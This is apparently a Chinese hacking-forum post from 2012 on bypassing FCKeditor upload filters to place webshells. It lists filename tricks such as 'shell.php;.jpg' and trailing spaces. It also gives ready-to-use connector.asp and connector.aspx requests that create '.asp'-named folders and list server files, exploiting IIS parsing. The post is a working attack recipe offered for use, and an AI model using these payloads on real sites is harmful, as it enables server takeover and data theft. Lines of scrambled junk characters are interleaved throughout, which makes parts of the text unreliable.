很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
n( d$ k* ?/ t+ C' W8 ^: D% y! b9 M& [9 E8 h
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。1 \5 [- Q3 f1 _. D0 t5 v1 s2 ]. }3 W
3 a8 q: {% c* X) k/ n继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
( I) M# O( D) M
: K3 {/ ?$ R$ _* s4 P7 L; s5 r+ a突破建立文件夹:) S, C; c7 ?3 m, h, F
' g/ T& T9 `' U1 reditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
/ V+ x) A: i! a8 x" N. G3 j$ a5 n. K+ ^: x
参数:
/ H* K* |. f e4 I
& I3 z6 ?2 d' h# H当前目录名:CurrentFolder=/qing.asp
t% j" l" E6 H: S R% V$ e R3 F' \% _, [
新的目录名:NewFolderName=x.asp& w- H1 @' z- [
U' g7 a2 C2 L& f9 U其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……3 A' l$ m" M) Q
; R: I( D- d- `. H4 `+ ^" S0 o那么 x.asp 就已经建立生成了,此方法百试百灵!# D' H+ }/ M$ S2 q) V' r# N$ r$ B: N
) l; s! m% P. a/ N* d新建文件夹参数 x.asp,基本都能搞定。1 T5 a. E& Z' Q6 z9 o
0 U* P1 ? N' M% M4 F. d下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
$ n# b6 P8 V8 E/ D! C1 s
2 d' U- k& h1 }( g, p! C* B. paspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
, C3 l) _9 a! Z0 K( w, ~5 |
- o6 c" B3 c* |3 Q4 f/ D0 I" f获取文件列表' @; _+ E8 T/ y
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F# D b* g0 C+ O5 D" Z4 h3 \) t
' K$ e/ d3 J+ J/ K
|
发表于 2012-12-31 09:27:09
收藏
支持
反对